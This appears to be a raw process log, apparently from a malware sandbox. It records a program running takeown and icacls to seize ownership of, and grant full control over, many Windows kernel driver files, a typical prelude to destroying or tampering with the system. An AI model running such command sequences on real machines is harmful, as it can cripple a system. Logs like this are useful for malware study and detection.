"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppvVemgr.sys && icacls C:\Windows\System32\drivers\AppvVemgr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\appid.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppvVfs.sys && icacls C:\Windows\System32\drivers\AppvVfs.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\applockerfltr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AppVStrm.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\applockerfltr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AppVStrm.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AppvVemgr.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AppvVfs.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AppvVemgr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AppvVfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hvsocket.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\HyperVideo.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\hyperkbd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iai2c.sys && icacls C:\Windows\System32\drivers\iai2c.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\i8042prt.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\HyperVideo.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iagpio.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iagpio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iai2c.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iai2c.sys /grant "Admin:F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_GLK.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys && icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_GPIO2_CNL.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSSi_GPIO.sys && icacls C:\Windows\System32\drivers\iaLPSSi_GPIO.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaLPSSi_I2C.sys && icacls C:\Windows\System32\drivers\iaLPSSi_I2C.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_BXT_P.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorAVC.sys && icacls C:\Windows\System32\drivers\iaStorAVC.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSSi_GPIO.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_GLK.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSS2i_I2C_CNL.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ibbus.sys && icacls C:\Windows\System32\drivers\ibbus.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaLPSSi_I2C.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSSi_GPIO.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IndirectKmd.sys && icacls C:\Windows\System32\drivers\IndirectKmd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaLPSSi_I2C.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaStorAVC.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaStorAVC.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iaStorV.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ibbus.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelpep.sys && icacls C:\Windows\System32\drivers\intelpep.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelpmax.sys && icacls C:\Windows\System32\drivers\intelpmax.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\IndirectKmd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ibbus.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelide.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelpep.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\IndirectKmd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IntelTA.sys && icacls C:\Windows\System32\drivers\IntelTA.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelpmax.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelpep.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iorate.sys && icacls C:\Windows\System32\drivers\iorate.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\intelppm.sys
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelpmax.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\IntelTA.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\iorate.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\intelppm.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\IntelTA.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipfltdrv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\iorate.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\IPMIDrv.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipt.sys && icacls C:\Windows\System32\drivers\ipt.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipnat.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ItSas35i.sys && icacls C:\Windows\System32\drivers\ItSas35i.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ipt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipnat.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ipt.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\isapnp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbldfltr.sys && icacls C:\Windows\System32\drivers\kbldfltr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ItSas35i.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kdnic.sys && icacls C:\Windows\System32\drivers\kdnic.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbdclass.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbdhid.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\KNetPwrDepBroker.sys && icacls C:\Windows\System32\drivers\KNetPwrDepBroker.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ItSas35i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kbldfltr.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kbldfltr.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\kdnic.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\kdnic.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\KNetPwrDepBroker.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ks.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksecdd.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\KNetPwrDepBroker.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksthunk.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2i.sys && icacls C:\Windows\System32\drivers\lsi_sas2i.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ksecpkg.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas3i.sys && icacls C:\Windows\System32\drivers\lsi_sas3i.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sss.sys && icacls C:\Windows\System32\drivers\lsi_sss.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lltdio.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas2i.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas2i.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sas3i.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mausbhost.sys && icacls C:\Windows\System32\drivers\mausbhost.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\lsi_sss.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sas3i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mausbip.sys && icacls C:\Windows\System32\drivers\mausbip.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\luafv.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\lsi_sss.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MbbCx.sys && icacls C:\Windows\System32\drivers\MbbCx.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mausbhost.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mausbip.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mausbhost.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MbbCx.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSas2i.sys && icacls C:\Windows\System32\drivers\MegaSas2i.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mcd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mausbip.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MbbCx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas35i.sys && icacls C:\Windows\System32\drivers\megasas35i.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasr.sys && icacls C:\Windows\System32\drivers\megasr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\megasas.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys && icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\MegaSas2i.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\megasas35i.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys && icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\MegaSas2i.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\megasas35i.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mlx4_bus.sys && icacls C:\Windows\System32\drivers\mlx4_bus.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\megasr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mmcss.sys && icacls C:\Windows\System32\drivers\mmcss.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\megasr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mlx4_bus.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mmcss.sys
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mlx4_bus.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\mmcss.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\modem.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mouclass.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\monitor.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\mouhid.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
